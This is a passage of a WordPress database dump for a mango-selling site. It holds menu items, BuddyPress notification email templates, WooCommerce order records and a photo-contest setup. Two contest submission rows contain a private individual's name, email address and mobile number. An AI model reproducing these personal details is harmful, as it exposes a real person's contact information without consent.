11:24:06','',0,'https://mangomitra.in/2022/02/09/945/',3,'nav_menu_item','',0),(946,1,'2022-02-09 16:54:06','2022-02-09 11:24:06',' ','','','publish','closed','closed','','946','','','2022-02-09 16:54:06','2022-02-09 11:24:06','',0,'https://mangomitra.in/2022/02/09/946/',0,'nav_menu_item','',0),(947,1,'2022-02-09 16:54:06','2022-02-09 11:24:06',' ','','','publish','closed','closed','','947','','','2022-02-09 16:54:06','2022-02-09 11:24:06','',0,'https://mangomitra.in/2022/02/09/947/',2,'nav_menu_item','',0),(948,1,'2022-02-09 16:54:07','2022-02-09 11:24:07',' ','','','publish','closed','closed','','948','','','2022-02-09 16:54:07','2022-02-09 11:24:07','',0,'https://mangomitra.in/2022/02/09/948/',3,'nav_menu_item','',0),(949,1,'2022-02-09 16:54:08','2022-02-09 11:24:08',' ','','','publish','closed','closed','','949','','','2022-02-09 16:54:08','2022-02-09 11:24:08','',0,'https://mangomitra.in/2022/02/09/949/',0,'nav_menu_item','',0),(958,1,'2022-02-14 10:23:06','2022-02-14 04:53:06','','polylang_mo_91','','private','closed','closed','','polylang_mo_91','','','2022-02-14 10:23:06','2022-02-14 04:53:06','',0,'https://mangomitra.in/?post_type=polylang_mo&p=958',0,'polylang_mo','',0),(959,1,'2022-02-14 10:23:10','2022-02-14 04:53:10','','polylang_mo_93','','private','closed','closed','','polylang_mo_93','','','2022-02-14 10:23:10','2022-02-14 04:53:10','',0,'https://mangomitra.in/?post_type=polylang_mo&p=959',0,'polylang_mo','',0),(960,1,'2022-02-14 10:23:13','2022-02-14 04:53:13','','polylang_mo_95','','private','closed','closed','','polylang_mo_95','','','2022-02-14 10:23:13','2022-02-14 04:53:13','',0,'https://mangomitra.in/?post_type=polylang_mo&p=960',0,'polylang_mo','',0),(961,1,'2022-02-14 10:23:17','2022-02-14 04:53:17','','polylang_mo_97','','private','closed','closed','','polylang_mo_97','','','2022-02-14 10:23:17','2022-02-14 04:53:17','',0,'https://mangomitra.in/?post_type=polylang_mo&p=961',0,'polylang_mo','',0),(962,1,'2022-02-14 10:23:21','2022-02-14 04:53:21','','polylang_mo_99','','private','closed','closed','','polylang_mo_99','','','2022-02-14 10:23:21','2022-02-14 04:53:21','',0,'https://mangomitra.in/?post_type=polylang_mo&p=962',0,'polylang_mo','',0),(963,1,'2022-02-14 10:23:24','2022-02-14 04:53:24','','polylang_mo_101','','private','closed','closed','','polylang_mo_101','','','2022-02-14 10:23:24','2022-02-14 04:53:24','',0,'https://mangomitra.in/?post_type=polylang_mo&p=963',0,'polylang_mo','',0),(964,1,'2022-02-14 10:23:30','2022-02-14 04:53:30','','polylang_mo_103','','private','closed','closed','','polylang_mo_103','','','2022-02-14 10:23:30','2022-02-14 04:53:30','',0,'https://mangomitra.in/?post_type=polylang_mo&p=964',0,'polylang_mo','',0),(966,1,'2022-02-14 11:36:02','2022-02-14 06:06:02','','Gifting','','publish','closed','closed','','gifting','','','2022-02-14 12:24:08','2022-02-14 06:54:08','',0,'https://mangomitra.in/?post_type=fpf_fields&#038;p=966',0,'fpf_fields','',0),(967,1,'2022-02-14 11:45:06','2022-02-14 06:15:06','','polylang_mo_105','','private','closed','closed','','polylang_mo_105','','','2022-02-14 11:45:06','2022-02-14 06:15:06','',0,'https://mangomitra.in/?post_type=polylang_mo&p=967',0,'polylang_mo','',0),(970,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','','Activity','','publish','closed','closed','','activity','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/activity/',0,'page','',0),(971,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','','Members','','publish','closed','closed','','members','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/members/',0,'page','',0),(972,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Welcome to {{site.name}}!\n\nVisit your <a href=\"{{{profile.url}}}\">profile</a>, where you can tell us more about yourself, change your preferences, or make new connections, to get started.\n\nForgot your password? Don\'t worry, you can reset it with your email address from <a href=\"{{{lostpassword.url}}}\">this page</a> of our site','[{{{site.name}}}] Welcome!','Welcome to {{site.name}}!\n\nVisit your profile, where you can tell us more about yourself, change your preferences, or make new connections, to get started: {{{profile.url}}}\n\nForgot your password? Don\'t worry, you can reset it with your email address from this page of our site: {{{lostpassword.url}}}','publish','closed','closed','','site-name-welcome','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=972',0,'bp-email','',0),(973,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{poster.name}} replied to one of your updates:\n\n<blockquote>&quot;{{usermessage}}&quot;</blockquote>\n\n<a href=\"{{{thread.url}}}\">Go to the discussion</a> to reply or catch up on the conversation.','[{{{site.name}}}] {{poster.name}} replied to one of your updates','{{poster.name}} replied to one of your updates:\n\n\"{{usermessage}}\"\n\nGo to the discussion to reply or catch up on the conversation: {{{thread.url}}}','publish','closed','closed','','site-name-poster-name-replied-to-one-of-your-updates','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=973',0,'bp-email','',0),(974,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{poster.name}} replied to one of your comments:\n\n<blockquote>&quot;{{usermessage}}&quot;</blockquote>\n\n<a href=\"{{{thread.url}}}\">Go to the discussion</a> to reply or catch up on the conversation.','[{{{site.name}}}] {{poster.name}} replied to one of your comments','{{poster.name}} replied to one of your comments:\n\n\"{{usermessage}}\"\n\nGo to the discussion to reply or catch up on the conversation: {{{thread.url}}}','publish','closed','closed','','site-name-poster-name-replied-to-one-of-your-comments','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=974',0,'bp-email','',0),(975,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{poster.name}} mentioned you in a status update:\n\n<blockquote>&quot;{{usermessage}}&quot;</blockquote>\n\n<a href=\"{{{mentioned.url}}}\">Go to the discussion</a> to reply or catch up on the conversation.','[{{{site.name}}}] {{poster.name}} mentioned you in a status update','{{poster.name}} mentioned you in a status update:\n\n\"{{usermessage}}\"\n\nGo to the discussion to reply or catch up on the conversation: {{{mentioned.url}}}','publish','closed','closed','','site-name-poster-name-mentioned-you-in-a-status-update','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=975',0,'bp-email','',0),(976,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{poster.name}} mentioned you in the group \"{{group.name}}\":\n\n<blockquote>&quot;{{usermessage}}&quot;</blockquote>\n\n<a href=\"{{{mentioned.url}}}\">Go to the discussion</a> to reply or catch up on the conversation.','[{{{site.name}}}] {{poster.name}} mentioned you in an update','{{poster.name}} mentioned you in the group \"{{group.name}}\":\n\n\"{{usermessage}}\"\n\nGo to the discussion to reply or catch up on the conversation: {{{mentioned.url}}}','publish','closed','closed','','site-name-poster-name-mentioned-you-in-an-update','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=976',0,'bp-email','',0),(977,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Thanks for registering!\n\nTo complete the activation of your account, go to the following link and click on the <strong>Activate</strong> button:\n<a href=\"{{{activate.url}}}\">{{{activate.url}}}</a>\n\nIf the \'Activation Key\' field is empty, copy and paste the following into the field - {{key}}','[{{{site.name}}}] Activate your account','Thanks for registering!\n\nTo complete the activation of your account, go to the following link and click on the \'Activate\' button: {{{activate.url}}}\n\nIf the \'Activation Key\' field is empty, copy and paste the following into the field - {{key}}','publish','closed','closed','','site-name-activate-your-account','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=977',0,'bp-email','',0),(978,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','<a href=\"{{{initiator.url}}}\">{{initiator.name}}</a> wants to add you as a friend.\n\nTo accept this request and manage all of your pending requests, visit: <a href=\"{{{friend-requests.url}}}\">{{{friend-requests.url}}}</a>','[{{{site.name}}}] New friendship request from {{initiator.name}}','{{initiator.name}} wants to add you as a friend.\n\nTo accept this request and manage all of your pending requests, visit: {{{friend-requests.url}}}\n\nTo view {{initiator.name}}\'s profile, visit: {{{initiator.url}}}','publish','closed','closed','','site-name-new-friendship-request-from-initiator-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=978',0,'bp-email','',0),(979,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','<a href=\"{{{friendship.url}}}\">{{friend.name}}</a> accepted your friend request.','[{{{site.name}}}] {{friend.name}} accepted your friendship request','{{friend.name}} accepted your friend request.\n\nTo learn more about them, visit their profile: {{{friendship.url}}}','publish','closed','closed','','site-name-friend-name-accepted-your-friendship-request','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=979',0,'bp-email','',0),(980,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Group details for the group &quot;<a href=\"{{{group.url}}}\">{{group.name}}</a>&quot; were updated:\n<blockquote>{{changed_text}}</blockquote>','[{{{site.name}}}] Group details updated','Group details for the group \"{{group.name}}\" were updated:\n\n{{changed_text}}\n\nTo view the group, visit: {{{group.url}}}','publish','closed','closed','','site-name-group-details-updated','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=980',0,'bp-email','',0),(981,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','<a href=\"{{{inviter.url}}}\">{{inviter.name}}</a> has invited you to join the group: &quot;{{group.name}}&quot;.\n\n{{invite.message}}\n\n<a href=\"{{{invites.url}}}\">Go here to accept your invitation</a> or <a href=\"{{{group.url}}}\">visit the group</a> to learn more.','[{{{site.name}}}] You have an invitation to the group: \"{{group.name}}\"','{{inviter.name}} has invited you to join the group: \"{{group.name}}\".\n\n{{invite.message}}\n\nTo accept your invitation, visit: {{{invites.url}}}\n\nTo learn more about the group, visit: {{{group.url}}}.\nTo view {{inviter.name}}\'s profile, visit: {{{inviter.url}}}','publish','closed','closed','','site-name-you-have-an-invitation-to-the-group-group-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=981',0,'bp-email','',0),(982,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','You have been promoted to <b>{{promoted_to}}</b> in the group &quot;<a href=\"{{{group.url}}}\">{{group.name}}</a>&quot;.','[{{{site.name}}}] You have been promoted in the group: \"{{group.name}}\"','You have been promoted to {{promoted_to}} in the group: \"{{group.name}}\".\n\nTo visit the group, go to: {{{group.url}}}','publish','closed','closed','','site-name-you-have-been-promoted-in-the-group-group-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=982',0,'bp-email','',0),(983,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','<a href=\"{{{profile.url}}}\">{{requesting-user.name}}</a> wants to join the group &quot;{{group.name}}&quot;.\n {{request.message}}\n As you are an administrator of this group, you must either accept or reject the membership request.\n\n<a href=\"{{{group-requests.url}}}\">Go here to manage this</a> and all other pending requests.','[{{{site.name}}}] Membership request for group: {{group.name}}','{{requesting-user.name}} wants to join the group \"{{group.name}}\". As you are the administrator of this group, you must either accept or reject the membership request.\n\nTo manage this and all other pending requests, visit: {{{group-requests.url}}}\n\nTo view {{requesting-user.name}}\'s profile, visit: {{{profile.url}}}','publish','closed','closed','','site-name-membership-request-for-group-group-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=983',0,'bp-email','',0),(984,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{sender.name}} sent you a new message: &quot;{{usersubject}}&quot;\n\n<blockquote>&quot;{{usermessage}}&quot;</blockquote>\n\n<a href=\"{{{message.url}}}\">Go to the discussion</a> to reply or catch up on the conversation.','[{{{site.name}}}] New message from {{sender.name}}','{{sender.name}} sent you a new message: \"{{usersubject}}\"\n\n\"{{usermessage}}\"\n\nGo to the discussion to reply or catch up on the conversation: {{{message.url}}}','publish','closed','closed','','site-name-new-message-from-sender-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=984',0,'bp-email','',0),(985,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','You recently changed the email address associated with your account on {{site.name}} to {{user.email}}. If this is correct, <a href=\"{{{verify.url}}}\">go here to confirm the change</a>.\n\nOtherwise, you can safely ignore and delete this email if you have changed your mind, or if you think you have received this email in error.','[{{{site.name}}}] Verify your new email address','You recently changed the email address associated with your account on {{site.name}} to {{user.email}}. If this is correct, go to the following link to confirm the change: {{{verify.url}}}\n\nOtherwise, you can safely ignore and delete this email if you have changed your mind, or if you think you have received this email in error.','publish','closed','closed','','site-name-verify-your-new-email-address','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=985',0,'bp-email','',0),(986,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Your membership request for the group &quot;<a href=\"{{{group.url}}}\">{{group.name}}</a>&quot; has been accepted.','[{{{site.name}}}] Membership request for group \"{{group.name}}\" accepted','Your membership request for the group \"{{group.name}}\" has been accepted.\n\nTo view the group, visit: {{{group.url}}}','publish','closed','closed','','site-name-membership-request-for-group-group-name-accepted','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=986',0,'bp-email','',0),(987,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Your membership request for the group &quot;<a href=\"{{{group.url}}}\">{{group.name}}</a>&quot; has been rejected.','[{{{site.name}}}] Membership request for group \"{{group.name}}\" rejected','Your membership request for the group \"{{group.name}}\" has been rejected.\n\nTo request membership again, visit: {{{group.url}}}','publish','closed','closed','','site-name-membership-request-for-group-group-name-rejected','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=987',0,'bp-email','',0),(988,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','<a href=\"{{{inviter.url}}}\">{{inviter.name}}</a> has invited you to join the site: &quot;{{site.name}}&quot;.\n\n{{usermessage}}\n\n<a href=\"{{{invite.accept_url}}}\">Accept your invitation</a> or <a href=\"{{{site.url}}}\">visit the site</a> to learn more.','{{inviter.name}} has invited you to join {{site.name}}','{{inviter.name}} has invited you to join the site \"{{site.name}}\".\n\n{{usermessage}}\n\nTo accept your invitation, visit: {{{invite.accept_url}}}\n\nTo learn more about the site, visit: {{{site.url}}}.\nTo view {{inviter.name}}\'s profile, visit: {{{inviter.url}}}','publish','closed','closed','','inviter-name-has-invited-you-to-join-site-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=988',0,'bp-email','',0),(989,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','{{requesting-user.user_login}} would like to join the site: &quot;{{site.name}}&quot;.\n\n<a href=\"{{{manage.url}}}\">Manage the request</a>.','{{requesting-user.user_login}} would like to join {{site.name}}','{{requesting-user.user_login}} would like to join the site \"{{site.name}}\".\n\nTo manage the request, visit: {{{manage.url}}}.','publish','closed','closed','','requesting-user-user_login-would-like-to-join-site-name','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=989',0,'bp-email','',0),(990,1,'2022-02-15 10:52:01','2022-02-15 05:22:01','Sorry, your request to join the site &quot;{{site.name}}&quot; has been declined.','Your request to join {{site.name}} has been declined','Sorry, your request to join the site \"{{site.name}}\" has been declined.','publish','closed','closed','','your-request-to-join-site-name-has-been-declined','','','2022-02-15 10:52:01','2022-02-15 05:22:01','',0,'https://mangomitra.in/?post_type=bp-email&p=990',0,'bp-email','',0),(992,1,'2022-02-17 11:30:55','2022-02-17 06:00:55','<!-- wp:shortcode -->\n[wc_frontend_manager]\n<!-- /wp:shortcode -->','Store Manager','','inherit','closed','closed','','633-revision-v1','','','2022-02-17 11:30:55','2022-02-17 06:00:55','',633,'https://mangomitra.in/?p=992',0,'revision','',0),(993,1,'2022-02-17 16:23:21','2022-02-17 10:53:21','[wc_frontend_manager]','Store Manager','','inherit','closed','closed','','633-revision-v1','','','2022-02-17 16:23:21','2022-02-17 10:53:21','',633,'https://mangomitra.in/?p=993',0,'revision','',0),(994,1,'2022-02-17 16:26:48','2022-02-17 10:56:48','[wcfm_vendor_membership]','Vendor Membership','','inherit','closed','closed','','635-revision-v1','','','2022-02-17 16:26:48','2022-02-17 10:56:48','',635,'https://mangomitra.in/?p=994',0,'revision','',0),(995,1,'2022-02-17 16:26:48','2022-02-17 10:56:48','[wcfm_vendor_registration]','Vendor Registration','','inherit','closed','closed','','636-revision-v1','','','2022-02-17 16:26:48','2022-02-17 10:56:48','',636,'https://mangomitra.in/?p=995',0,'revision','',0),(997,1,'2022-02-17 16:45:16','2022-02-17 11:15:16','<!-- wp:shortcode -->\n[woocommerce_my_account]\n<!-- /wp:shortcode -->','My account','','inherit','closed','closed','','11-revision-v1','','','2022-02-17 16:45:16','2022-02-17 11:15:16','',11,'https://mangomitra.in/?p=997',0,'revision','',0),(998,1,'2022-02-22 16:57:12','2022-02-22 11:27:12','','Order &ndash; February 22, 2022 @ 04:57 PM','','wc-processing','open','closed','wc_order_UhWHB4wppUPMb','order-feb-22-2022-1127-am','','','2022-02-22 16:58:52','2022-02-22 11:28:52','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=998',0,'shop_order','',3),(999,20,'2022-02-23 17:57:06','2022-02-23 12:27:06','','mango-fruit-isolated-white-background-39063419','','inherit','closed','closed','','mango-fruit-isolated-white-background-39063419','','','2022-02-23 18:06:34','2022-02-23 12:36:34','',0,'https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419.jpg',0,'attachment','image/jpeg',0),(1002,1,'2022-02-24 10:41:57','2022-02-24 05:11:57','','Order &ndash; February 24, 2022 @ 10:41 AM','please deliver this order','wc-completed','open','closed','wc_order_rfidsixWomwhi','order-feb-24-2022-0511-am','','','2022-02-24 10:47:02','2022-02-24 05:17:02','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1002',0,'shop_order','',5),(1003,22,'2022-02-24 15:24:55','2022-02-24 09:54:55','','mango-fruit-isolated-white-background-39063419','','inherit','closed','closed','','mango-fruit-isolated-white-background-39063419-2','','','2022-02-24 15:25:08','2022-02-24 09:55:08','',0,'https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-1.jpg',0,'attachment','image/jpeg',0),(1005,1,'2022-02-24 15:37:15','2022-02-24 10:07:15','','Order &ndash; February 24, 2022 @ 03:37 PM','','wc-processing','open','closed','wc_order_fNOSTBOF3n01D','order-feb-24-2022-1007-am','','','2022-02-24 15:37:34','2022-02-24 10:07:34','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1005',0,'shop_order','',3),(1007,1,'2022-02-24 16:47:21','2022-02-24 11:17:21','<!-- wp:paragraph -->\n<p>Free shipping on orders above 500</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[woocommerce_checkout]\n<!-- /wp:shortcode -->','Checkout','','inherit','closed','closed','','10-revision-v1','','','2022-02-24 16:47:21','2022-02-24 11:17:21','',10,'https://mangomitra.in/?p=1007',0,'revision','',0),(1008,1,'2022-02-25 09:33:41','2022-02-25 04:03:41','','Order &ndash; February 25, 2022 @ 09:33 AM','','wc-cancel-request','open','closed','wc_order_jCBSPE7dq8vqj','order-feb-25-2022-0403-am','','','2022-02-25 12:03:04','2022-02-25 06:33:04','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1008',0,'shop_order','',4),(1009,21,'2022-02-25 09:35:42','2022-02-25 04:05:42','','mango-fruit-isolated-white-background-39063419-2','','inherit','closed','closed','','mango-fruit-isolated-white-background-39063419-2-2','','','2022-02-25 09:35:42','2022-02-25 04:05:42','',1010,'/storage/v6964/mangomitra/public_html/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2.jpg',0,'attachment','image/jpeg',0),(1010,21,'2022-02-25 09:35:42','2022-02-25 04:05:42','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1009,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":1009,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2.jpg\"},\"thumbnail\":{\"id\":1009,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2-150x150.jpg\"},\"preview\":\"[totalcontest-image id=\\\"1009\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2-150x150.jpg\\\"]\",\"content\":\"[totalcontest-image id=\\\"1009\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2.jpg\\\"]\"}},\"token\":\"aebf0d1c-ef90-4779-9b06-30502c6298d1\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','publish','closed','closed','','1010','','','2022-02-25 09:35:42','2022-02-25 04:05:42','',900,'https://mangomitra.in/contest/photo-contest/submission/1010/',0,'contest_submission','',0),(1011,21,'2022-02-25 09:35:42','2022-02-25 04:05:42','{\"fields\":{\"field\":\"pavithra g\",\"field_copy\":\"pavitra@utfindia.in\",\"field_copy_copy\":\"07411722844\",\"field_copy_copy_copy\":1009,\"action\":\"participate\",\"contestId\":\"900\",\"context\":\"page\",\"menu\":\"1\"},\"contents\":{\"field_copy_copy_copy\":{\"type\":\"attachment\",\"attachment\":{\"id\":1009,\"type\":\"image\",\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2.jpg\"},\"thumbnail\":{\"id\":1009,\"url\":\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2-150x150.jpg\"},\"preview\":\"[totalcontest-image id=\\\"1009\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2-150x150.jpg\\\"]\",\"content\":\"[totalcontest-image id=\\\"1009\\\" src=\\\"https://mangomitra.in/wp-content/uploads/2022/02/mango-fruit-isolated-white-background-39063419-2.jpg\\\"]\"}},\"token\":\"aebf0d1c-ef90-4779-9b06-30502c6298d1\",\"meta\":{\"schema\":\"1.0\"}}','Submissionname','','inherit','closed','closed','','1010-revision-v1','','','2022-02-25 09:35:42','2022-02-25 04:05:42','',1010,'https://mangomitra.in/?p=1011',0,'revision','',0),(1012,1,'2022-02-25 11:07:47','2022-02-25 05:37:47','','Order &ndash; February 25, 2022 @ 11:07 AM','','wc-completed','open','closed','wc_order_zUtKLNUthntiH','order-feb-25-2022-0537-am','','','2022-02-25 11:31:08','2022-02-25 06:01:08','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1012',0,'shop_order','',6),(1013,1,'2022-02-25 12:04:22','2022-02-25 06:34:22','','Order &ndash; February 25, 2022 @ 12:04 PM','','wc-cancelled','open','closed','wc_order_off2xn0U5zAGB','order-feb-25-2022-0634-am','','','2022-02-25 12:13:03','2022-02-25 06:43:03','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1013',0,'shop_order','',9),(1014,1,'2022-02-25 16:15:11','2022-02-25 10:45:11','{\"id\":\"900\",\"contest\":{\"form\":{\"fields\":[{\"uid\":\"ee5c8322-a7e6-49eb-a322-9c084e1f36fe\",\"type\":\"text\",\"name\":\"field\",\"label\":\"Name\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"c7fa3447-49c0-4c91-bd3e-da389293e284\",\"type\":\"text\",\"name\":\"field_copy\",\"label\":\"Email\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"49a0b086-30fd-490c-be13-c018891d5207\",\"type\":\"text\",\"name\":\"field_copy_copy\",\"label\":\"Mobile Number\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":false,\"validations\":{\"filter\":{\"rules\":[]}},\"attributes\":[],\"template\":\"\"},{\"uid\":\"6f0f286e-b3d5-4730-b3bc-bd48f3a05dde\",\"type\":\"image\",\"name\":\"field_copy_copy_copy\",\"label\":\"Insert Image\",\"defaultValue\":\"\",\"options\":\"\",\"collapsed\":true,\"validations\":[],\"attributes\":[],\"template\":\"\"}]},\"submissions\":{\"requiresApproval\":false,\"title\":\"Submission{{name}}\",\"subtitle\":\"{{votes}} Votes | {{views}} Views\",\"content\":\"\",\"preview\":{\"source\":\"\",\"default\":\"\"},\"perPage\":9,\"blocks\":{\"enabled\":true,\"submissions\":[{\"uid\":\"0aa0c292-691b-4916-9c2b-5b47bc7f9f89\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"},{\"uid\":\"3042d58a-97a7-4db3-8b8f-56fd102ef100\",\"type\":\"title\",\"expressions\":[{\"uid\":\"67ca9573-d330-4b6a-9992-aaa4ca823cda\",\"type\":\"val\",\"source\":\"Submission #\"},{\"uid\":\"2522c0fd-85d7-4549-8cad-6993e01ec80b\",\"type\":\"var\",\"source\":\"id\"}]},{\"uid\":\"bd818d5a-ec0d-4e69-b777-a3656dff51ef\",\"type\":\"subtitle\",\"expressions\":[{\"uid\":\"4264813d-4698-4925-ab5c-990853a62715\",\"type\":\"var\",\"source\":\"votesWithLabel\"},{\"uid\":\"d2601afb-c511-4026-ae12-1679c3d740b9\",\"type\":\"val\",\"source\":\" | \"},{\"uid\":\"878581b8-39d1-4acc-8b37-3196303977cc\",\"type\":\"var\",\"source\":\"viewsWithLabel\"}]}],\"submission\":[{\"uid\":\"56788872-e95c-46b1-b4b2-94fe4139c705\",\"type\":\"image\",\"source\":\"contents.field_copy_copy_copy.attachment.url\",\"fallback\":\"\"}]}},\"limitations\":{\"quota\":{\"value\":0},\"period\":{\"start\":\"\",\"end\":\"\"}},\"frequency\":{\"cookies\":{\"enabled\":true},\"ip\":{\"enabled\":false},\"user\":{\"enabled\":false},\"count\":2,\"timeout\":3600}},\"menu\":{\"items\":[{\"id\":\"home\",\"label\":\"\"},{\"id\":\"participate\",\"label\":\"\"},{\"id\":\"submissions\",\"label\":\"\"},{\"id\":\"pages\",\"label\":\"\"}],\"default\":\"participate\"},\"pages\":{\"landing\":{\"title\":\"\",\"content\":\"\"},\"participate\":{\"title\":\"\",\"content\":\"\"},\"submissions\":{\"title\":\"\",\"content\":\"\"},\"thankyou\":{\"voting\":{\"content\":\"Your vote has been casted. Thank you!\"},\"submission\":{\"content\":\"Thank you for participating in this contest!\"}},\"default\":\"participate\",\"other\":[{\"id\":\"terms\",\"title\":\"Terms\",\"content\":\"\",\"collapsed\":true},{\"id\":\"prizes\",\"title\":\"Prizes\",\"content\":\"\",\"collapsed\":false}]},\"design\":{\"template\":\"basic-template\",\"text\":{\"fontFamily\":\"inherit\",\"fontWeight\":\"inherit\",\"fontSize\":\"inherit\",\"lineHeight\":\"inherit\",\"align\":\"inherit\",\"transform\":\"none\"},\"colors\":{\"primary\":\"#209610\",\"primaryContrast\":\"#ffffff\",\"primaryDark\":\"#239913\",\"secondary\":\"#3eb538\",\"secondaryContrast\":\"#ffffff\",\"secondaryDark\":\"#489b0d\",\"accent\":\"#dd9933\",\"accentContrast\":\"#ffffff\",\"accentDark\":\"#925802\",\"dark\":\"#333333\",\"white\":\"#ffffff\",\"gray\":\"#dddddd\",\"grayDark\":\"#aaaaaa\",\"grayLight\":\"#eeeeee\",\"grayLighter\":\"#fafafa\"},\"custom\":{\"container\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"\",\"color\":\"\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"toolbar\":{\"colors\":{\"background\":\"#ffffff\",\"border\":\"#dddddd\"},\"border\":{\"width\":\"1px\",\"style\":\"solid\",\"radius\":\"4px\"},\"padding\":{\"top\":\"0.5em\",\"right\":\"0.5em\",\"bottom\":\"0.5em\",\"left\":\"0.5em\"},\"shadows\":{\"box\":\"0 2px 2px rgba(0, 0, 0, 